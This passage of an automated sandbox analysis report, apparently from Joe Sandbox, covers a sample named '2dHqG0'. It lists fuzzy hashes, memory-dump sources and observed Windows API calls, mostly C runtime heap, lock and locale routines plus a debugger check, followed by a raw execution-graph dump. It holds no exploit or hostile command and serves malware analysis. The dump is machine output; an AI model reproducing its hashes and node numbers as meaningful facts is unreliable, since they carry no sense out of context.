                                                                                        • Opcode ID: 173a0753eb1870a11fb702d1a013be029f39be02b255bbe32865f3a9974466fd
                                                                                        • Instruction ID: 707035d8fb084b7d50352dafe5e0d3ea22c218e70a9efd2db2f4bdc1438e07ff
                                                                                        • Opcode Fuzzy Hash: 173a0753eb1870a11fb702d1a013be029f39be02b255bbe32865f3a9974466fd
                                                                                        • Instruction Fuzzy Hash: 5BA16F70A00606EFEB18CFA9C880AAEB7B5FF48308F54516AE515DB351DB70E961CF90

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 122 25412a0-25412ce NdrClientCall2
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000028.00000002.3514566277.0000000002540000.00000040.00001000.00020000.00000000.sdmp, Offset: 02540000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_40_2_2540000_2dHqG0.jbxd
                                                                                        Similarity
                                                                                        • API ID: Call2Client
                                                                                        • String ID:
                                                                                        • API String ID: 1775071923-0
                                                                                        • Opcode ID: 4666de08af870ddb6bef69c0f490482e33997d6d42adbca8fb7ab2f5f23bbb04
                                                                                        • Instruction ID: bd2d5c4a6279affdb845742771da5e8caae126a025c3303e8fa798e8260075a2
                                                                                        • Opcode Fuzzy Hash: 4666de08af870ddb6bef69c0f490482e33997d6d42adbca8fb7ab2f5f23bbb04
                                                                                        • Instruction Fuzzy Hash: FDD05EB1A01208BBD704CE98DC51AE97BECE785201F0040AAED0AC2200E9355A545699

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • IsDebuggerPresent.KERNEL32 ref: 00B21346
                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00B2135B
                                                                                        • UnhandledExceptionFilter.KERNEL32(00B2816C), ref: 00B21366
                                                                                        • GetCurrentProcess.KERNEL32(C0000409), ref: 00B21382
                                                                                        • TerminateProcess.KERNEL32(00000000), ref: 00B21389
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000028.00000002.3514225993.0000000000B21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B20000, based on PE: true
                                                                                        • Associated: 00000028.00000002.3514200896.0000000000B20000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000028.00000002.3514252671.0000000000B28000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000028.00000002.3514278623.0000000000B2A000.00000004.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000028.00000002.3514303518.0000000000B2C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_40_2_b20000_2dHqG0.jbxd
                                                                                        Similarity
                                                                                        • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                        • String ID:
                                                                                        • API String ID: 2579439406-0
                                                                                        • Opcode ID: 299fc83960eea0c34b69bc74372044eac10b1eaada45dbfda9bb6e0b039b1dfc
                                                                                        • Instruction ID: a7d45a04b20c189c53d7480d5ffc85a7c69ab49b7c655167a5ecdda9e7572117
                                                                                        • Opcode Fuzzy Hash: 299fc83960eea0c34b69bc74372044eac10b1eaada45dbfda9bb6e0b039b1dfc
                                                                                        • Instruction Fuzzy Hash: C421CCB4811204DFC730DF28FD846493BB4FB18792F40446AE50897A61EFB8598ACF5B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000028.00000003.3240271717.0000000002540000.00000040.00001000.00020000.00000000.sdmp, Offset: 02540000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_40_3_2540000_2dHqG0.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: l$ntdl
                                                                                        • API String ID: 0-924918826
                                                                                        • Opcode ID: 6c9c6db97d8771c7cf8e0db104e1040736491d6c0939765109556fa2b78a9631
                                                                                        • Instruction ID: d4a5a6343f07ed69ea2e5c8dc1c274cfce36ae9923bff03bb06d71050e8e4c7f
                                                                                        • Opcode Fuzzy Hash: 6c9c6db97d8771c7cf8e0db104e1040736491d6c0939765109556fa2b78a9631
                                                                                        • Instruction Fuzzy Hash: 94117CB5600602AFCB19AF18D408A1FFBA6FF89710B618159E10997750FB34EA218BD9
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000028.00000003.3243525764.0000000002440000.00000040.00001000.00020000.00000000.sdmp, Offset: 02440000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_40_3_2440000_2dHqG0.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: l$ntdl
                                                                                        • API String ID: 0-924918826
                                                                                        • Opcode ID: 6c9c6db97d8771c7cf8e0db104e1040736491d6c0939765109556fa2b78a9631
                                                                                        • Instruction ID: b795de194978db9d274ba09186b0edf29e11cf9cc6a41e0792bd0f5dc02de25b
                                                                                        • Opcode Fuzzy Hash: 6c9c6db97d8771c7cf8e0db104e1040736491d6c0939765109556fa2b78a9631
                                                                                        • Instruction Fuzzy Hash: 74118EB5700601AFDB19AF19E408A0EBBF6FF89710B21815EE10597710EF34EA218FD5
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000028.00000003.3240271717.0000000002540000.00000040.00001000.00020000.00000000.sdmp, Offset: 02540000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_40_3_2540000_2dHqG0.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: l$ntdl
                                                                                        • API String ID: 0-924918826
                                                                                        • Opcode ID: 0c2c30aec7a625bf31c8c356953fe1e8142b6a83dabfcff9fbbd6bac14ed309e
                                                                                        • Instruction ID: 35f231bdab73eea31f3f6f012976c4545ed0d9273bc5045d03c60da3c2980b5f
                                                                                        • Opcode Fuzzy Hash: 0c2c30aec7a625bf31c8c356953fe1e8142b6a83dabfcff9fbbd6bac14ed309e
                                                                                        • Instruction Fuzzy Hash: 6501C871700114AFCB04DF98C840DAEFBB9FF84754F104099FA05A7350DA70DE048B95
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000028.00000003.3243525764.0000000002440000.00000040.00001000.00020000.00000000.sdmp, Offset: 02440000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_40_3_2440000_2dHqG0.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: l$ntdl
                                                                                        • API String ID: 0-924918826
                                                                                        • Opcode ID: 0c2c30aec7a625bf31c8c356953fe1e8142b6a83dabfcff9fbbd6bac14ed309e
                                                                                        • Instruction ID: b66a8a4a2e577378a2f9880da52495e4ed0209503bcab41ba5c321d5b85d6906
                                                                                        • Opcode Fuzzy Hash: 0c2c30aec7a625bf31c8c356953fe1e8142b6a83dabfcff9fbbd6bac14ed309e
                                                                                        • Instruction Fuzzy Hash: 7E01C472B00614AFDB14DF99C840DAEFBB9EF88754F00409EFA05A7360DA70DE148BA1

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNEL32(KERNEL32.DLL,00B29458,0000000C,00B22320,00000000,00000000,?,00B2174F,00000003,?,?,?,?,?,?,00B210F6), ref: 00B221F7
                                                                                        • __crt_waiting_on_module_handle.LIBCMT ref: 00B22202
                                                                                          • Part of subcall function 00B213E1: Sleep.KERNEL32(000003E8,00000000,?,00B22148,KERNEL32.DLL,?,00B22194,?,00B2174F,00000003), ref: 00B213ED
                                                                                          • Part of subcall function 00B213E1: GetModuleHandleW.KERNEL32(?,?,00B22148,KERNEL32.DLL,?,00B22194,?,00B2174F,00000003,?,?,?,?,?,?,00B210F6), ref: 00B213F6
                                                                                        • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 00B2222B
                                                                                        • GetProcAddress.KERNEL32(?,DecodePointer), ref: 00B2223B
                                                                                        • __lock.LIBCMT ref: 00B2225D
                                                                                        • InterlockedIncrement.KERNEL32(00B2A4D8), ref: 00B2226A
                                                                                        • __lock.LIBCMT ref: 00B2227E
                                                                                        • ___addlocaleref.LIBCMT ref: 00B2229C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000028.00000002.3514225993.0000000000B21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B20000, based on PE: true
                                                                                        • Associated: 00000028.00000002.3514200896.0000000000B20000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000028.00000002.3514252671.0000000000B28000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000028.00000002.3514278623.0000000000B2A000.00000004.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000028.00000002.3514303518.0000000000B2C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_40_2_b20000_2dHqG0.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
                                                                                        • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                                                                                        • API String ID: 1028249917-2843748187
                                                                                        • Opcode ID: 9dde6ff21a021d4f401a2100a5f2b5422581a3c53517843b0679d60c8ac7b32d
                                                                                        • Instruction ID: 7d7daea5d2ab3def8d84af9a5457a9c31f791da994a622b5218dd9223f492667
                                                                                        • Opcode Fuzzy Hash: 9dde6ff21a021d4f401a2100a5f2b5422581a3c53517843b0679d60c8ac7b32d
                                                                                        • Instruction Fuzzy Hash: BA11C071801710EFE720EF75F806B4ABBE0AF14310F204599E49DD73A0CF749A418B25

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • __getptd.LIBCMT ref: 00B240AC
                                                                                          • Part of subcall function 00B22345: __getptd_noexit.LIBCMT ref: 00B22348
                                                                                          • Part of subcall function 00B22345: __amsg_exit.LIBCMT ref: 00B22355
                                                                                        • __amsg_exit.LIBCMT ref: 00B240CC
                                                                                        • __lock.LIBCMT ref: 00B240DC
                                                                                        • InterlockedDecrement.KERNEL32(?), ref: 00B240F9
                                                                                        • InterlockedIncrement.KERNEL32(02572C68), ref: 00B24124
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000028.00000002.3514225993.0000000000B21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B20000, based on PE: true
                                                                                        • Associated: 00000028.00000002.3514200896.0000000000B20000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000028.00000002.3514252671.0000000000B28000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000028.00000002.3514278623.0000000000B2A000.00000004.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000028.00000002.3514303518.0000000000B2C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_40_2_b20000_2dHqG0.jbxd
                                                                                        Similarity
                                                                                        • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                        • String ID:
                                                                                        • API String ID: 4271482742-0
                                                                                        • Opcode ID: 62a98a7c71cd538113ea6d50165bfe04dc1b7b107bd4b0f4d52a06fe37a3890f
                                                                                        • Instruction ID: 551237db0bd1055071147ccc22eab43b37ee5c868b63f592ce6c24638cb0d2c5
                                                                                        • Opcode Fuzzy Hash: 62a98a7c71cd538113ea6d50165bfe04dc1b7b107bd4b0f4d52a06fe37a3890f
                                                                                        • Instruction Fuzzy Hash: 7601AD32901631EBDB25AF25B80675A77E0FF14B11F044085E90CB7A91CB34A992CFD6

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • __lock.LIBCMT ref: 00B2360C
                                                                                          • Part of subcall function 00B22AA0: __mtinitlocknum.LIBCMT ref: 00B22AB6
                                                                                          • Part of subcall function 00B22AA0: __amsg_exit.LIBCMT ref: 00B22AC2
                                                                                          • Part of subcall function 00B22AA0: EnterCriticalSection.KERNEL32(?,?,?,00B25600,00000004,00B29628,0000000C,00B23746,?,?,00000000,00000000,00000000,?,00B222F7,00000001), ref: 00B22ACA
                                                                                        • ___sbh_find_block.LIBCMT ref: 00B23617
                                                                                        • ___sbh_free_block.LIBCMT ref: 00B23626
                                                                                        • HeapFree.KERNEL32(00000000,?,00B29568,0000000C,00B22A81,00000000,00B294C8,0000000C,00B22ABB,?,?,?,00B25600,00000004,00B29628,0000000C), ref: 00B23656
                                                                                        • GetLastError.KERNEL32(?,00B25600,00000004,00B29628,0000000C,00B23746,?,?,00000000,00000000,00000000,?,00B222F7,00000001,00000214), ref: 00B23667
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000028.00000002.3514225993.0000000000B21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B20000, based on PE: true
                                                                                        • Associated: 00000028.00000002.3514200896.0000000000B20000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000028.00000002.3514252671.0000000000B28000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000028.00000002.3514278623.0000000000B2A000.00000004.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000028.00000002.3514303518.0000000000B2C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_40_2_b20000_2dHqG0.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                        • String ID:
                                                                                        • API String ID: 2714421763-0
                                                                                        • Opcode ID: 6da0786ecfdd44fc211145515d8f996c38806697f71347b5ef8c8c35e5bfa5c4
                                                                                        • Instruction ID: 9a4cf565c1b772ba18c1c3d256dc1ff1cb32cfabe1899bf1c6cae487745be45e
                                                                                        • Opcode Fuzzy Hash: 6da0786ecfdd44fc211145515d8f996c38806697f71347b5ef8c8c35e5bfa5c4
                                                                                        • Instruction Fuzzy Hash: 60012C71D09325BADB326F71BC06B5E36E8EF11B60F604089B54CA6291CE3C8A418A59
                                                                                        APIs
                                                                                        • __getptd.LIBCMT ref: 00B23E10
                                                                                          • Part of subcall function 00B22345: __getptd_noexit.LIBCMT ref: 00B22348
                                                                                          • Part of subcall function 00B22345: __amsg_exit.LIBCMT ref: 00B22355
                                                                                        • __getptd.LIBCMT ref: 00B23E27
                                                                                        • __amsg_exit.LIBCMT ref: 00B23E35
                                                                                        • __lock.LIBCMT ref: 00B23E45
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000028.00000002.3514225993.0000000000B21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B20000, based on PE: true
                                                                                        • Associated: 00000028.00000002.3514200896.0000000000B20000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000028.00000002.3514252671.0000000000B28000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000028.00000002.3514278623.0000000000B2A000.00000004.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000028.00000002.3514303518.0000000000B2C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_40_2_b20000_2dHqG0.jbxd
                                                                                        Similarity
                                                                                        • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                        • String ID:
                                                                                        • API String ID: 3521780317-0
                                                                                        • Opcode ID: 64dc8c25286e0ee0bc66418efda177efe92d83c237131b4beaace4666ce3dfc7
                                                                                        • Instruction ID: be7ed71f0902c8300e740dae695cdd80dae128e5179bec5e172a4865e2d123e3
                                                                                        • Opcode Fuzzy Hash: 64dc8c25286e0ee0bc66418efda177efe92d83c237131b4beaace4666ce3dfc7
                                                                                        • Instruction Fuzzy Hash: 85F06D329003309BD761FB74B40774D72E0AF58B10F1145D9A45D972A1CF789A46CA62

                                                                                        Execution Graph

                                                                                        Execution Coverage:6%
                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                        Signature Coverage:0%
                                                                                        Total number of Nodes:1048
                                                                                        Total number of Limit Nodes:28
API calls 3709->3710 3711 6c5493 3710->3711 3713 6c54ac 3711->3713 3716 6c29c6 LeaveCriticalSection 3713->3716 3715 6c54b3 3715->3707 3716->3715 3717->3605 3719 6c493d HeapReAlloc 3718->3719 3720 6c4971 HeapAlloc 3718->3720 3721 6c495f 3719->3721 3722 6c495b 3719->3722 3720->3722 3723 6c4994 VirtualAlloc 3720->3723 3721->3720 3722->3473 3723->3722 3724 6c49ae HeapFree 3723->3724 3724->3722 3726 6c49f1 VirtualAlloc 3725->3726 3728 6c4a38 3726->3728 3728->3477 3729->3480 3730->3408 3749 6c29c6 LeaveCriticalSection 3731->3749 3733 6c227c 3733->3418 3735 6c3cbc InterlockedIncrement 3734->3735 3736 6c3cbf 3734->3736 3735->3736 3737 6c3ccc 3736->3737 3738 6c3cc9 InterlockedIncrement 3736->3738 3739 6c3cd9 3737->3739 3740 6c3cd6 InterlockedIncrement 3737->3740 3738->3737 3741 6c3ce3 InterlockedIncrement 3739->3741 3743 6c3ce6 3739->3743 3740->3739 3741->3743 3742 6c3cff InterlockedIncrement 3742->3743 3743->3742 3744 6c3d1a InterlockedIncrement 3743->3744 3745 6c3d0f InterlockedIncrement 3743->3745 3744->3421 3745->3743 3750 6c29c6 LeaveCriticalSection 3746->3750 3748 6c22ca 3748->3423 3749->3733 3750->3748 3751->3283 3753 6c3808 3752->3753 3754 6c1dd3 3753->3754 3755 6c382f __VEC_memcpy 3753->3755 3754->3302 3755->3754 3757 6c368d 3756->3757 3758 6c3694 3756->3758 3757->3758 3763 6c36c0 3757->3763 3759 6c2c72 __calloc_impl 66 API calls 3758->3759 3760 6c3699 3759->3760 3761 6c2c0a __calloc_impl 6 API calls 3760->3761 3762 6c36a8 3761->3762 3762->3321 3763->3762 3764 6c2c72 __calloc_impl 66 API calls 3763->3764 3764->3760 3767 6c2dc9 3765->3767 3766 6c207e __encode_pointer 6 API calls 3766->3767 3767->3766 3768 6c2de1 3767->3768 3768->3327 3772 6c2d70 3769->3772 3771 6c2db9 3771->3329 3773 6c2d7c __calloc_impl 3772->3773 3780 6c147d 3773->3780 3779 6c2d9d __calloc_impl 3779->3771 3781 6c2aa0 __lock 66 API calls 3780->3781 3782 6c1484 3781->3782 3783 6c2c85 3782->3783 3784 6c20f9 __decode_pointer 6 API calls 3783->3784 3785 6c2c99 3784->3785 3786 6c20f9 __decode_pointer 6 
API calls 3785->3786 3788 6c2ca9 3786->3788 3787 6c2d2c 3800 6c2da6 3787->3800 3788->3787 3803 6c539a 3788->3803 3790 6c2d13 3791 6c207e __encode_pointer 6 API calls 3790->3791 3792 6c2d21 3791->3792 3795 6c207e __encode_pointer 6 API calls 3792->3795 3793 6c2ceb 3793->3787 3797 6c377c __realloc_crt 73 API calls 3793->3797 3798 6c2d01 3793->3798 3794 6c2cc7 3794->3790 3794->3793 3816 6c377c 3794->3816 3795->3787 3797->3798 3798->3787 3799 6c207e __encode_pointer 6 API calls 3798->3799 3799->3790 3866 6c1486 3800->3866 3804 6c53a6 __calloc_impl 3803->3804 3805 6c53b6 3804->3805 3806 6c53d3 3804->3806 3807 6c2c72 __calloc_impl 66 API calls 3805->3807 3808 6c5414 HeapSize 3806->3808 3809 6c2aa0 __lock 66 API calls 3806->3809 3810 6c53bb 3807->3810 3812 6c53cb __calloc_impl 3808->3812 3813 6c53e3 ___sbh_find_block 3809->3813 3811 6c2c0a __calloc_impl 6 API calls 3810->3811 3811->3812 3812->3794 3821 6c5434 3813->3821 3817 6c3785 3816->3817 3819 6c37c4 3817->3819 3820 6c37a5 Sleep 3817->3820 3825 6c569d 3817->3825 3819->3793 3820->3817 3824 6c29c6 LeaveCriticalSection 3821->3824 3823 6c540f 3823->3808 3823->3812 3824->3823 3826 6c56a9 __calloc_impl 3825->3826 3827 6c56be 3826->3827 3828 6c56b0 3826->3828 3830 6c56c5 3827->3830 3831 6c56d1 3827->3831 3829 6c54b5 _malloc 66 API calls 3828->3829 3847 6c56b8 _realloc __calloc_impl 3829->3847 3832 6c35ee ___free_lconv_num 66 API calls 3830->3832 3837 6c5843 3831->3837 3861 6c56de ___sbh_resize_block ___sbh_find_block 3831->3861 3832->3847 3833 6c5876 3836 6c31eb __calloc_impl 6 API calls 3833->3836 3834 6c5848 HeapReAlloc 3834->3837 3834->3847 3835 6c2aa0 __lock 66 API calls 3835->3861 3838 6c587c 3836->3838 3837->3833 3837->3834 3839 6c589a 3837->3839 3841 6c31eb __calloc_impl 6 API calls 3837->3841 3844 6c5890 3837->3844 3840 6c2c72 __calloc_impl 66 API calls 3838->3840 3842 6c2c72 __calloc_impl 66 API calls 3839->3842 3839->3847 3840->3847 3841->3837 3843 6c58a3 GetLastError 3842->3843 3843->3847 3846 6c2c72 __calloc_impl 
66 API calls 3844->3846 3849 6c5811 3846->3849 3847->3817 3848 6c5769 HeapAlloc 3848->3861 3849->3847 3851 6c5816 GetLastError 3849->3851 3850 6c57be HeapReAlloc 3850->3861 3851->3847 3852 6c4dc3 ___sbh_alloc_block 5 API calls 3852->3861 3853 6c5829 3853->3847 3855 6c2c72 __calloc_impl 66 API calls 3853->3855 3854 6c31eb __calloc_impl 6 API calls 3854->3861 3857 6c5836 3855->3857 3856 6c4614 VirtualFree VirtualFree HeapFree ___sbh_free_block 3856->3861 3857->3843 3857->3847 3858 6c580c 3860 6c2c72 __calloc_impl 66 API calls 3858->3860 3859 6c37f0 __VEC_memcpy _realloc 3859->3861 3860->3849 3861->3833 3861->3835 3861->3847 3861->3848 3861->3850 3861->3852 3861->3853 3861->3854 3861->3856 3861->3858 3861->3859 3862 6c57e1 3861->3862 3865 6c29c6 LeaveCriticalSection 3862->3865 3864 6c57e8 3864->3861 3865->3864 3869 6c29c6 LeaveCriticalSection 3866->3869 3868 6c148d 3868->3779 3869->3868 3871 6c1561 __calloc_impl 3870->3871 3872 6c2aa0 __lock 66 API calls 3871->3872 3873 6c1568 3872->3873 3874 6c1631 __initterm 3873->3874 3875 6c1594 3873->3875 3889 6c166c 3874->3889 3877 6c20f9 __decode_pointer 6 API calls 3875->3877 3879 6c159f 3877->3879 3881 6c1621 __initterm 3879->3881 3883 6c20f9 __decode_pointer 6 API calls 3879->3883 3880 6c1669 __calloc_impl 3880->3346 3881->3874 3887 6c15b4 3883->3887 3884 6c1660 3885 6c1465 _fast_error_exit 3 API calls 3884->3885 3885->3880 3886 6c20f0 6 API calls ___crtMessageBoxW 3886->3887 3887->3881 3887->3886 3888 6c20f9 6 API calls __decode_pointer 3887->3888 3888->3887 3890 6c164d 3889->3890 3891 6c1672 3889->3891 3890->3880 3893 6c29c6 LeaveCriticalSection 3890->3893 3894 6c29c6 LeaveCriticalSection 3891->3894 3893->3884 3894->3890 3948 6c4247 3958 6c41cb 3948->3958 3951 6c4272 setSBCS 3952 6c10cc ___ansicp 5 API calls 3951->3952 3954 6c442a 3952->3954 3953 6c42b6 IsValidCodePage 3953->3951 3955 6c42c8 GetCPInfo 3953->3955 3955->3951 3957 6c42db __calloc_impl __setmbcp_nolock 3955->3957 3965 6c3f0d GetCPInfo 3957->3965 3975 6c4144 
3958->3975 3961 6c4208 3963 6c420d GetACP 3961->3963 3964 6c41fa 3961->3964 3962 6c41ea GetOEMCP 3962->3964 3963->3964 3964->3951 3964->3953 3964->3957 3968 6c3f41 __calloc_impl 3965->3968 3974 6c3ff3 3965->3974 4191 6c5fe2 3968->4191 3970 6c10cc ___ansicp 5 API calls 3972 6c409e 3970->3972 3972->3957 3973 6c6415 ___crtLCMapStringA 101 API calls 3973->3974 3974->3970 3976 6c4157 3975->3976 3978 6c41a4 3975->3978 3983 6c2345 3976->3983 3978->3961 3978->3962 3979 6c4184 3979->3978 4003 6c40a0 3979->4003 3984 6c22cc __getptd_noexit 66 API calls 3983->3984 3985 6c234d 3984->3985 3986 6c235a 3985->3986 3987 6c1411 __amsg_exit 66 API calls 3985->3987 3986->3979 3988 6c3e04 3986->3988 3987->3986 3989 6c3e10 __calloc_impl 3988->3989 3990 6c2345 __getptd 66 API calls 3989->3990 3991 6c3e15 3990->3991 3992 6c3e43 3991->3992 3993 6c3e27 3991->3993 3994 6c2aa0 __lock 66 API calls 3992->3994 3995 6c2345 __getptd 66 API calls 3993->3995 3996 6c3e4a 3994->3996 3997 6c3e2c 3995->3997 4019 6c3dc6 3996->4019 4001 6c3e3a __calloc_impl 3997->4001 4002 6c1411 __amsg_exit 66 API calls 3997->4002 4001->3979 4002->4001 4004 6c40ac __calloc_impl 4003->4004 4005 6c2345 __getptd 66 API calls 4004->4005 4006 6c40b1 4005->4006 4007 6c2aa0 __lock 66 API calls 4006->4007 4008 6c40c3 4006->4008 4009 6c40e1 4007->4009 4011 6c40d1 __calloc_impl 4008->4011 4015 6c1411 __amsg_exit 66 API calls 4008->4015 4010 6c412a 4009->4010 4012 6c40f8 InterlockedDecrement 4009->4012 4013 6c4112 InterlockedIncrement 4009->4013 4187 6c413b 4010->4187 4011->3978 4012->4013 4016 6c4103 4012->4016 4013->4010 4015->4011 4016->4013 4017 6c35ee ___free_lconv_num 66 API calls 4016->4017 4018 6c4111 4017->4018 4018->4013 4020 6c3dca 4019->4020 4021 6c3dfc 4019->4021 4020->4021 4022 6c3c9e ___addlocaleref 8 API calls 4020->4022 4027 6c3e6e 4021->4027 4023 6c3ddd 4022->4023 4023->4021 4030 6c3d2d 4023->4030 4186 6c29c6 LeaveCriticalSection 4027->4186 4029 6c3e75 4029->3997 4031 6c3d3e InterlockedDecrement 4030->4031 4032 
6c3dc1 4030->4032 4033 6c3d56 4031->4033 4034 6c3d53 InterlockedDecrement 4031->4034 4032->4021 4044 6c3b55 4032->4044 4035 6c3d60 InterlockedDecrement 4033->4035 4036 6c3d63 4033->4036 4034->4033 4035->4036 4037 6c3d6d InterlockedDecrement 4036->4037 4038 6c3d70 4036->4038 4037->4038 4039 6c3d7a InterlockedDecrement 4038->4039 4041 6c3d7d 4038->4041 4039->4041 4040 6c3d96 InterlockedDecrement 4040->4041 4041->4040 4042 6c3da6 InterlockedDecrement 4041->4042 4043 6c3db1 InterlockedDecrement 4041->4043 4042->4041 4043->4032 4045 6c3bd9 4044->4045 4052 6c3b6c 4044->4052 4046 6c35ee ___free_lconv_num 66 API calls 4045->4046 4047 6c3c26 4045->4047 4048 6c3bfa 4046->4048 4057 6c3c4d 4047->4057 4098 6c5ae1 4047->4098 4050 6c35ee ___free_lconv_num 66 API calls 4048->4050 4056 6c3c0d 4050->4056 4052->4045 4055 6c35ee ___free_lconv_num 66 API calls 4052->4055 4070 6c3ba0 4052->4070 4053 6c3c92 4059 6c35ee ___free_lconv_num 66 API calls 4053->4059 4054 6c35ee ___free_lconv_num 66 API calls 4054->4057 4060 6c3b95 4055->4060 4061 6c35ee ___free_lconv_num 66 API calls 4056->4061 4057->4053 4068 6c35ee 66 API calls ___free_lconv_num 4057->4068 4058 6c35ee ___free_lconv_num 66 API calls 4063 6c3bce 4058->4063 4064 6c3c98 4059->4064 4074 6c5cbb 4060->4074 4066 6c3c1b 4061->4066 4062 6c35ee ___free_lconv_num 66 API calls 4067 6c3bb6 4062->4067 4069 6c35ee ___free_lconv_num 66 API calls 4063->4069 4064->4021 4071 6c35ee ___free_lconv_num 66 API calls 4066->4071 4090 6c5c76 4067->4090 4068->4057 4069->4045 4070->4062 4073 6c3bc1 4070->4073 4071->4047 4073->4058 4075 6c5cc8 4074->4075 4089 6c5d45 4074->4089 4076 6c5cd9 4075->4076 4078 6c35ee ___free_lconv_num 66 API calls 4075->4078 4077 6c5ceb 4076->4077 4079 6c35ee ___free_lconv_num 66 API calls 4076->4079 4080 6c5cfd 4077->4080 4081 6c35ee ___free_lconv_num 66 API calls 4077->4081 4078->4076 4079->4077 4082 6c35ee ___free_lconv_num 66 API calls 4080->4082 4083 6c5d0f 4080->4083 4081->4080 4082->4083 4084 6c35ee ___free_lconv_num 66 
API calls 4083->4084 4085 6c5d21 4083->4085 4084->4085 4086 6c35ee ___free_lconv_num 66 API calls 4085->4086 4087 6c5d33 4085->4087 4086->4087 4088 6c35ee ___free_lconv_num 66 API calls 4087->4088 4087->4089 4088->4089 4089->4070 4091 6c5c83 4090->4091 4097 6c5cb7 4090->4097 4092 6c35ee ___free_lconv_num 66 API calls 4091->4092 4095 6c5c93 4091->4095 4092->4095 4093 6c35ee ___free_lconv_num 66 API calls 4094 6c5ca5 4093->4094 4096 6c35ee ___free_lconv_num 66 API calls 4094->4096 4094->4097 4095->4093 4095->4094 4096->4097 4097->4073 4099 6c5af2 4098->4099 4185 6c3c46 4098->4185 4100 6c35ee ___free_lconv_num 66 API calls 4099->4100 4101 6c5afa 4100->4101 4102 6c35ee ___free_lconv_num 66 API calls 4101->4102 4103 6c5b02 4102->4103 4104 6c35ee ___free_lconv_num 66 API calls 4103->4104 4105 6c5b0a 4104->4105 4106 6c35ee ___free_lconv_num 66 API calls 4105->4106 4107 6c5b12 4106->4107 4108 6c35ee ___free_lconv_num 66 API calls 4107->4108 4109 6c5b1a 4108->4109 4110 6c35ee ___free_lconv_num 66 API calls 4109->4110 4111 6c5b22 4110->4111 4112 6c35ee ___free_lconv_num 66 API calls 4111->4112 4113 6c5b29 4112->4113 4114 6c35ee ___free_lconv_num 66 API calls 4113->4114 4115 6c5b31 4114->4115 4116 6c35ee ___free_lconv_num 66 API calls 4115->4116 4117 6c5b39 4116->4117 4118 6c35ee ___free_lconv_num 66 API calls 4117->4118 4119 6c5b41 4118->4119 4120 6c35ee ___free_lconv_num 66 API calls 4119->4120 4121 6c5b49 4120->4121 4122 6c35ee ___free_lconv_num 66 API calls 